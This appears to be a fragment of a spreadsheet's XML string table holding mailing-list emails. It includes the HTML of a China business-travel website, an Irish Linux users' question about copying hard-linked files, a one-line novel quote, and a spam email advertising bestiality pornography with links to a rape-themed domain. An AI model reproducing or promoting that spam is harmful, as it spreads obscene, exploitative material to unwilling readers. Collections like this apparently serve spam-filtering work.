         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/pic1.jpg" width=3D"189" height=3D=
 "49" border=3D"0"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/pic3.jpg" width=3D"189" height=3D=
 "28" border=3D"0"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td&gt; 
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"5" =
 cellpadding=3D"0"&gt;
               &lt;tr&gt; 
                 &lt;td&gt; &lt;br&gt;
                   &lt;a href=3D=
 "http://www.china-business-travel.com/bizguide/01.html"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/dot1.gif" width=3D"13" height=3D=
 "14" border=3D"0"&gt;The 
                   people's Republic of China&lt;/a&gt;&lt;br&gt;
                   &lt;a href=3D=
 "http://www.china-business-travel.com/bizguide/02.html"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/dot1.gif" width=3D"13" height=3D=
 "14" border=3D"0"&gt;Natural 
                   Conditions&lt;/a&gt;&lt;br&gt;
                   &lt;a href=3D=
 "http://www.china-business-travel.com/bizguide/03.html"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/dot1.gif" width=3D"13" height=3D=
 "14" border=3D"0"&gt;Political 
                   System&lt;/a&gt;&lt;br&gt;
                   &lt;a href=3D=
 "http://www.china-business-travel.com/bizguide/04.html"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/dot1.gif" width=3D"13" height=3D=
 "14" border=3D"0"&gt;Industries 
                   and Infrastructure&lt;/a&gt;&lt;br&gt;
                   &lt;a href=3D=
 "http://www.china-business-travel.com/bizguide/05.html"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/dot1.gif" width=3D"13" height=3D=
 "14" border=3D"0"&gt;Foreign 
                   Trade Laws&lt;/a&gt;&lt;br&gt;
                   &lt;a href=3D=
 "http://www.china-business-travel.com/bizguide/06.html"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/dot1.gif" width=3D"13" height=3D=
 "14" border=3D"0"&gt;Import 
                   and Export Procedures&lt;/a&gt;&lt;br&gt;
                   &lt;a href=3D=
 "http://www.china-business-travel.com/bizguide/07.html"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/dot1.gif" width=3D"13" height=3D=
 "14" border=3D"0"&gt;Policy 
                   on Foreign&lt;/a&gt;&lt;br&gt;
                   &lt;a href=3D=
 "http://www.china-business-travel.com/bizguide/08.html"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/dot1.gif" width=3D"13" height=3D=
 "14" border=3D"0"&gt;Establishment 
                   and Termination&lt;/a&gt;&lt;br&gt;
                   &lt;a href=3D=
 "http://www.china-business-travel.com/bizguide/09.html"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/dot1.gif" width=3D"13" height=3D=
 "14" border=3D"0"&gt;Establishment 
                   of Representative &lt;img src=3D=
 "http://www.china-business-travel.com/images/dot2.gif" width=3D"13" height=3D=
 "14" border=3D"0"&gt;Offices&lt;/a&gt;&lt;br&gt;                        
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/pic2.jpg" width=3D"189" height=3D=
 "28" border=3D"0"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td&gt; 
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"5" =
 cellpadding=3D"0"&gt;
               &lt;tr&gt; 
                 &lt;td&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/travelguide/01.html"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/dot1.gif" width=3D"13" height=3D=
 "14" border=3D"0"&gt;Arrival 
                   and Departure&lt;/a&gt;&lt;br&gt;
                   &lt;a href=3D=
 "http://www.china-business-travel.com/travelguide/01.html"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/dot1.gif" width=3D"13" height=3D=
 "14" border=3D"0"&gt;&lt;/a&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/travelguide/02.html"&gt;Customs 
                   Declaration &lt;/a&gt;&lt;br&gt;
                   &lt;a href=3D=
 "http://www.china-business-travel.com/travelguide/01.html"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/dot1.gif" width=3D"13" height=3D=
 "14" border=3D"0"&gt;&lt;/a&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/travelguide/03.html"&gt;Passports 
                   and Visas&lt;/a&gt; &lt;br&gt;
                   &lt;a href=3D=
 "http://www.china-business-travel.com/travelguide/01.html"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/dot1.gif" width=3D"13" height=3D=
 "14" border=3D"0"&gt;&lt;/a&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/travelguide/04.html"&gt;Right 
                   of Residence&lt;/a&gt;&lt;br&gt;
                   &lt;a href=3D=
 "http://www.china-business-travel.com/travelguide/01.html"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/dot1.gif" width=3D"13" height=3D=
 "14" border=3D"0"&gt;&lt;/a&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/travelguide/05.html"&gt;Communications&lt;/a&gt; =
                   &lt;br&gt;
                   &lt;a href=3D=
 "http://www.china-business-travel.com/travelguide/01.html"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/dot1.gif" width=3D"13" height=3D=
 "14" border=3D"0"&gt;&lt;/a&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/travelguide/06.html"&gt;Transportation 
                   &lt;/a&gt;&lt;br&gt;
                   &lt;a href=3D=
 "http://www.china-business-travel.com/travelguide/01.html"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/dot1.gif" width=3D"13" height=3D=
 "14" border=3D"0"&gt;&lt;/a&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/travelguide/07.html"&gt;Accommodation 
                   and Shopping&lt;/a&gt;&lt;br&gt;
                   &lt;a href=3D=
 "http://www.china-business-travel.com/travelguide/01.html"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/dot1.gif" width=3D"13" height=3D=
 "14" border=3D"0"&gt;&lt;/a&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/travelguide/08.html"&gt;Medical 
                   &amp;amp; Health&lt;/a&gt;&lt;br&gt;
                   &lt;a href=3D=
 "http://www.china-business-travel.com/travelguide/01.html"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/dot1.gif" width=3D"13" height=3D=
 "14" border=3D"0"&gt;&lt;/a&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/travelguide/09.html"&gt;Sightseeing&lt;/a&gt;&lt;/t=
 d&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
     &lt;td width=3D"6"&gt;&lt;/td&gt;
     &lt;td valign=3D"top"&gt;
            &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" cellpadding=3D=
 "0" height=3D"4"&gt;
         &lt;tr&gt; 
           &lt;td&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table width=3D"522" border=3D"0" cellspacing=3D"0" cellpadding=3D"0"&gt;
         &lt;tr&gt; 
           &lt;td&gt;&lt;object classid=3D"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" =
 codebase=3D=
 "http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version==
 3D5,0,0,0" width=3D"522" height=3D"142"&gt;
               &lt;param name=3Dmovie value=3D=
 "http://www.china-business-travel.com/images/super.swf"&gt;
               &lt;param name=3Dquality value=3Dhigh&gt;
               &lt;embed src=3D"images/super.swf" quality=3D"high" pluginspage=3D=
 "http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=3D=
 ShockwaveFlash" type=3D"application/x-shockwave-flash" width=3D"522" height=3D=
 "142"&gt; 
             &lt;/object&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;br&gt;
       &lt;table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" width=3D"522"&gt;
         &lt;tr&gt; 
           &lt;td width=3D"10"&gt;&lt;/td&gt;
           &lt;td&gt; 
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
               &lt;tr&gt; 
                 &lt;td width=3D"170"&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/biztour/index.html"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/x1.jpg" width=3D"154" height=3D=
 "85" border=3D"0" alt=3D"Business Tour"&gt;&lt;/a&gt;&lt;/td&gt;
                 &lt;td valign=3D"top"&gt;&lt;b&gt;&lt;span &gt;&lt;font color=3D"487EB3"&gt;China 
                   Business Tour&lt;/font&gt;&lt;/span&gt;&lt;/b&gt;&lt;br&gt;
                   Today China remains the fastest growing economy in the =
 world, 
                   China is predicted to become the world's largest economic =
 center 
                   by the year 2030. If you have not been to China yet, the =
 opportunity 
                   is here, the time is now. &lt;a href=3D=
 "http://www.china-business-travel.com/biztour/index.html" class=3D"a01"&gt;Read 
 =
                   the detail &amp;gt;&amp;gt;&lt;/a&gt;&lt;/td&gt;                       
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;br&gt;&lt;br&gt;
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
               &lt;tr&gt; 
                 &lt;td valign=3D"top" width=3D"20"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td valign=3D"top"&gt;&lt;b &gt;&lt;font color=3D"487EB3"&gt;China Business =
 Assistant&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
                   &lt;img src=3D=
 "http://www.china-business-travel.com/images/error.gif" width=3D"9" height=3D=
 "9" border=3D"0"&gt; 
                   Through our experiences, we know the value of face-to-face =
 meetings 
                   in the international arena, and how developing trust and =
 respect 
                   with trading partners goes a long way toward ensuring =
 mutual 
                   success. &lt;a href=3D=
 "http://www.china-business-travel.com/bizconsult/index.html" class=3D=
 "a01"&gt;Read 
                   the detail &amp;gt;&amp;gt;&lt;/a&gt;&lt;/td&gt;                       
                 &lt;td width=3D"175" align=3D"right"&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/bizconsult/index.html"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/x2.jpg" width=3D"154" height=3D=
 "98" border=3D"0" alt=3D"Business Assistant"&gt;&lt;/a&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;br&gt;
             &lt;br&gt;
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
               &lt;tr&gt; 
                 &lt;td width=3D"250" valign=3D"top"&gt; &lt;b&gt;&lt;span &gt;&lt;font color=3D=
 "487EB3"&gt;China 
                   Customized Tour&lt;/font&gt;&lt;/span&gt;&lt;/b&gt; 
                   &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"4"&gt;
                     &lt;tr&gt; 
                       &lt;td&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/ff2.jpg" width=3D"68" height=3D=
 "120" border=3D"0"&gt;&lt;/td&gt;
                       &lt;td valign=3D"top"&gt;An itinerary can be arranged to meet =
 your                        
                         individual requirement; to include visiting =
 relatives,                        
                         friends, and business contacts.&lt;br&gt;
                         &lt;a href=3D=
 "http://www.china-business-travel.com/customized/index.html" class=3D=
 "a01"&gt;Read 
                         the detail &amp;gt;&amp;gt;&lt;/a&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
                 &lt;td valign=3D"top" width=3D"10"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td valign=3D"top"&gt; &lt;b&gt;&lt;font color=3D"487EB3"&gt;Exhibitions of =
 China                                   
                   2002&lt;/font&gt;&lt;/b&gt;
                   &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"4"&gt;
                     &lt;tr&gt; 
                       &lt;td&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/ff1.jpg" width=3D"68" height=3D=
 "120" border=3D"0"&gt;&lt;/td&gt;
                       &lt;td valign=3D"top"&gt;
                         &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"4"&gt;
                           &lt;tr&gt;  &lt;form name=3D"form1"&gt;
                             &lt;td&gt;
                                 &lt;select name=3D"menu1" onChange=3D=
 "MM_jumpMenu('parent',this,1)"&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/accessories.html"&gt;Accessorie=
 s 
                                   &lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/aeronautics.html"&gt;Aeronautic=
 s&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/agriculture.html" =
 selected&gt;Agriculture&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/automobiles.html"&gt;Automobile=
 s&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/building.html"&gt;Building&lt;/opt=
 ion&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/chemical.html"&gt;Chemical 
                                   Industry&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/clothing.html"&gt;Clothing&lt;/opt=
 ion&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/clothing-machinery.html"&gt;Clo=
 thing 
                                   Machinery&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/construction-machinery.html"=
 &gt;Construction 
                                   Machinery&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/computer.html"&gt;Computer 
                                   &amp; Communication&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/cosmetics.html"&gt;Cosmetics&lt;/o=
 ption&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/craftsman.html"&gt;Craftsman`s 
 =
                                   Equipment&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/educational.html"&gt;Educationa=
 l 
                                   Materials&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/electronics.html"&gt;Electronic=
 s&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/energy.html"&gt;Energy&lt;/option&gt;
 =
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/food.html"&gt;Food 
                                   &amp; Tobacco &amp; Wine&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/food-machine.html"&gt;Food 
                                   Machines &amp; Packaging&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/furniture.html"&gt;Furniture&lt;/o=
 ption&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/health-medical.html"&gt;Health 
 =
                                   &amp; Medical&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/hotel.html"&gt;Hotel 
                                   and Restaurant&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/industrial.html"&gt;Industrial 
 =
                                   Equipment &lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/interior.html"&gt;Interior 
                                   Design&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/leather.html"&gt;Leather 
                                   &lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/logos.html"&gt;Logos 
                                   &amp; Advertising &amp; Design&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/machine.html"&gt;Machine 
                                   Tools&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/nursery.html"&gt;Nursery 
                                   Equipment&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/paper.html"&gt;Paper 
                                   &amp; Printing&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/railway.html"&gt;Railway 
                                   &amp; Transport&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/safety.html"&gt;Safety 
                                   &amp; Fire Protection&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/scintefic.html"&gt;Scintefic 
                                   Equipment&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/sports.html"&gt;Sports 
                                   Equipment&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/tools.html"&gt;Tools&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/toys.html"&gt;Toys&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-businesst-ravel.com/exhibition/travel.html"&gt;Travel&lt;/option&gt;
 =
                                   &lt;option value=3D=
 "http://www.china-businesst-ravel.com/exhibition/waste.html"&gt;Waste 
                                   Technology&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/other.html"&gt;Other 
                                   Trade Fairs&lt;/option&gt;
                                   &lt;option value=3D=
 "http://www.china-business-travel.com/exhibition/fairs.html"&gt;Fairs 
                                   for Consumer Goods&lt;/option&gt;
                                 &lt;/select&gt;
                             &lt;/td&gt; &lt;/form&gt;
                           &lt;/tr&gt;
                         &lt;/table&gt;
                         We provide information query for all the exhibitions =
 in      
                         China every year, and offer various consulting =
 services      
                         for potential clients who have the intent to take =
 part      
                         in exhibitions in China. &lt;/td&gt;     
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;br&gt;&lt;br&gt;
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0" bgcolor=3D"F7F3F7"&gt;
               &lt;tr valign=3D"top"&gt; 
                 &lt;td width=3D"9" height=3D"9"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/arc3.jpg" width=3D"9" height=3D=
 "9"&gt;&lt;/td&gt;
                 &lt;td width=3D"69" height=3D"9"&gt;&lt;/td&gt;
                 &lt;td height=3D"9" width=3D"176"&gt;&lt;/td&gt;
                 &lt;td height=3D"9" width=3D"70"&gt;&lt;/td&gt;
                 &lt;td height=3D"9"&gt;&lt;/td&gt;
                 &lt;td width=3D"11" align=3D"right" height=3D"9"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/arc4.jpg" width=3D"9" height=3D=
 "9" border=3D"0"&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td width=3D"9"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"69" valign=3D"top"&gt; &lt;a href=3D=
 "http://www.china-business-travel.com/packages/index.html"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/sight1.jpg" width=3D"60" =
 height=3D"60" border=3D"0"&gt;&lt;/a&gt;&lt;/td&gt;
                 &lt;td valign=3D"top" width=3D"176"&gt; &lt;a href=3D=
 "http://www.china-business-travel.com/packages/index.html"&gt;&lt;b&gt;&lt;span &gt;&lt;font =
 color=3D"487EB3"&gt;China 
                   Tour Packages &lt;/font&gt;&lt;/span&gt;&lt;/b&gt;&lt;/a&gt; 
                   &lt;table width=3D"142" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
                     &lt;tr valign=3D"top"&gt; 
                       &lt;td width=3D"41%"&gt; &lt;img src=3D=
 "http://www.china-business-travel.com/images/dot3.jpg"&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/packages/CC.htm"&gt;China 
                         Civilization&lt;/a&gt; &lt;/td&gt; 
                     &lt;/tr&gt;
                     &lt;tr valign=3D"top"&gt; 
                       &lt;td width=3D"41%"&gt; &lt;img src=3D=
 "http://www.china-business-travel.com/images/dot3.jpg"&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/packages/ECS.htm"&gt;East 
                         China Splendor&lt;/a&gt; &lt;/td&gt;                     
                     &lt;/tr&gt;
                     &lt;tr valign=3D"top"&gt; 
                       &lt;td width=3D"41%"&gt; &lt;img src=3D=
 "http://www.china-business-travel.com/images/dot3.jpg"&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/packages/MC.htm"&gt;Memorial 
                         China&lt;/a&gt; &lt;/td&gt; 
                     &lt;/tr&gt;
                     &lt;tr valign=3D"top"&gt; 
                       &lt;td width=3D"41%"&gt; &lt;img src=3D=
 "http://www.china-business-travel.com/images/dot3.jpg"&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/packages/SRA.htm"&gt;Silk 
                         Road Adventure&lt;/a&gt; &lt;br&gt;
                         &lt;img src=3D=
 "http://www.china-business-travel.com/images/dot3.jpg"&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/packages/YRC.htm"&gt;Yangtze 
                         River Cruises&lt;/a&gt; &lt;br&gt;
                         &lt;img src=3D=
 "http://www.china-business-travel.com/images/dot3.jpg"&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/packages/MW.htm"&gt;Minority 
                         Wander&lt;/a&gt; &lt;br&gt;
                         &lt;img src=3D=
 "http://www.china-business-travel.com/images/dot3.jpg"&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/packages/MT.htm"&gt;Mystical 
                         Tibet&lt;/a&gt; &lt;/td&gt; 
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
                 &lt;td valign=3D"top" width=3D"70"&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/adventure/index.html"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/sight5.jpg" width=3D"60" =
 height=3D"60" border=3D"0"&gt;&lt;/a&gt;&lt;/td&gt;
                 &lt;td valign=3D"top"&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/adventure/index.html"&gt;&lt;b &gt;&lt;font color=3D=
 "487EB3"&gt;China 
                   Adventure&lt;/font&gt;&lt;/b&gt;&lt;/a&gt; 
                   &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
                     &lt;tr&gt;
                       &lt;td&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/dot3.jpg"&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/adventure/drifting.html" target=3D=
 "_blank"&gt;Drifting 
                         Tour&lt;/a&gt;&lt;br&gt;
                         &lt;img src=3D=
 "http://www.china-business-travel.com/images/dot3.jpg"&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/adventure/foot.html" target=3D=
 "_blank"&gt;Traveling 
                         on Foot&lt;/a&gt;&lt;br&gt;
                         &lt;img src=3D=
 "http://www.china-business-travel.com/images/dot3.jpg"&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/adventure/self-Driving.html" target=3D=
 "_blank"&gt;Self-Driving 
                         Tour&lt;/a&gt;&lt;br&gt;
                         &lt;img src=3D=
 "http://www.china-business-travel.com/images/dot3.jpg"&gt;&lt;a href=3D=
 "http://www.china-business-travel.com/adventure/martial.html" target=3D=
 "_blank"&gt;Martial 
                         Arts and Fitness Tour &lt;/a&gt;&lt;/td&gt;                       =
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
                 &lt;td width=3D"11" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr valign=3D"bottom"&gt; 
                 &lt;td width=3D"9" height=3D"9"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/arc2.jpg" width=3D"9" height=3D=
 "9" border=3D"0"&gt;&lt;/td&gt;
                 &lt;td width=3D"69" height=3D"9"&gt;&lt;/td&gt;
                 &lt;td height=3D"9" width=3D"176"&gt;&lt;/td&gt;
                 &lt;td height=3D"9" width=3D"70"&gt;&lt;/td&gt;
                 &lt;td height=3D"9"&gt;&lt;/td&gt;
                 &lt;td width=3D"11" align=3D"right" height=3D"9"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/arc1.jpg" width=3D"9" height=3D=
 "9" border=3D"0"&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;br&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;      
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width=3D"192" valign=3D"bottom" background=3D=
 "http://www.chinabusinesstravel.com/images/bg1.gif"&gt;&lt;img src=3D=
 "http://www.china-business-travel.com/images/corner3.gif" width=3D"192" =
 height=3D"18" border=3D"0"&gt;&lt;/td&gt;
     &lt;td width=3D"6"&gt;&lt;/td&gt;
     &lt;td align=3D"right"&gt;  &lt;map name=3D"Map"&gt; 
         &lt;area shape=3D"rect" coords=3D"184,17,212,32" href=3D=
 "http://www.china-business-travel.com/info/sqa.htm" target=3D"_blank"&gt;
         &lt;area shape=3D"rect" coords=3D"113,17,166,32" href=3D=
 "http://www.china-business-travel.com/info/contact.htm" target=3D"_blank"&gt;
         &lt;area shape=3D"rect" coords=3D"44,17,97,32" href=3D=
 "http://www.china-business-travel.com/info/about.htm" target=3D"_blank"&gt;
   &lt;/map&gt; 
       &lt;hr noshade size=3D"1" color=3D9BB2C7&gt;
       &lt;font color=3D"#666666"&gt;      &lt;table width=3D"100%" border=3D"0" =
 cellspacing=3D"0" cellpadding=3D"0"&gt;
         &lt;tr align=3D"right"&gt; 
           &lt;td&gt;&lt;font color=3D"#666666"&gt;Copyright &amp;copy; 2002 =
 Chinabusinesstravel,All                        
             Rights Reserved&lt;/font&gt;&lt;/td&gt;                       
           &lt;td&gt;&lt;font color=3D"#666666"&gt;E-mail:&lt;a href=3D=
 "mailto:info@chinabusinesstravel.com"&gt;&lt;font color=3D=
 "#666666"&gt;info@chinabusinesstravel.com&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;  
 --717fbb98-2427-46fa-b1fc-01aeb8d47c3f--
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] How to copy some files
</t>
  </si>
  <si>
    <t xml:space="preserve">I have about 60G of data which I need to copy from one disk to another.
 However, I'm not sure how I should best copy it. The problem is the bulk of
 the data is images and most of these image have two directory entries i.e.
 there is a hard link to each file. If I copy them using cp -a or my usual
 favourite of find .|cpio -pmd other_dir it's going to copy each file twice,
 which is not what I want. dump / restore would take care of this if the
 source filesystem wasn't reiserfs :-( Any suggestions ?
 Niall
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: You - the following ?
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;style type="text/css"&gt;
 &lt;!--
 a {  text-decoration: none }
 --&gt;
 &lt;/style&gt;
 &lt;body bgcolor="#000000" text="#339999"&gt;
 &lt;table width="100%" border="1" bgcolor="#009966" cellpadding="4" cellspacing="4" bordercolor="#99FF66"&gt;
   &lt;tr&gt;
     &lt;td bgcolor="#006633" bordercolor="#FF9900" align="center"&gt; 
       &lt;a href="http://pan.rape-sex.com/?refid=017dfc9e"&gt;&lt;font size="6" color="#FFFF00"&gt;&lt;b&gt;V.I.P 
         Animal lovers club invite new members!&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td bordercolor="#009966" align="center"&gt; 
         &lt;p&gt;&lt;a href="http://pan.rape-sex.com/?refid=017dfc9e"&gt;&lt;b&gt;&lt;font size="6" color="#33CC99"&gt;No 
           shit! Only REAL ANIMAL porn !&lt;/font&gt;&lt;br&gt;
           &lt;font size="6" color="#CCFFCC"&gt;Our super active members send&lt;br&gt;
           home video and photos every day!&lt;/font&gt;&lt;/b&gt;&lt;/a&gt;
         &lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td bgcolor="#006633" bordercolor="#FF9900" align="center"&gt; 
       &lt;a href="http://pan.rape-sex.com/?refid=017dfc9e"&gt; 
         &lt;font size="6" color="#FFFFCC"&gt;&lt;b&gt;Don't miss this 
         offer !&lt;br&gt;
         CLICK to JOIN US !&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p align="center"&gt;
 &lt;b&gt;&lt;a href="http://pan.rape-sex.com/unsub.cgi?em=fork@xent.com"&gt;&lt;font color="#336666"&gt;[ 
   remove my email from mail list ]&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;/body&gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Eugen Leitl wrote:
 &gt; P.S. We hate you, too.
 "Fuck you, sir," came the familiar tired chorus.
 "Louder!"
 "FUCK YOU, SIR!"
 Damn, I love that book (_Forever War_).
 - Joe
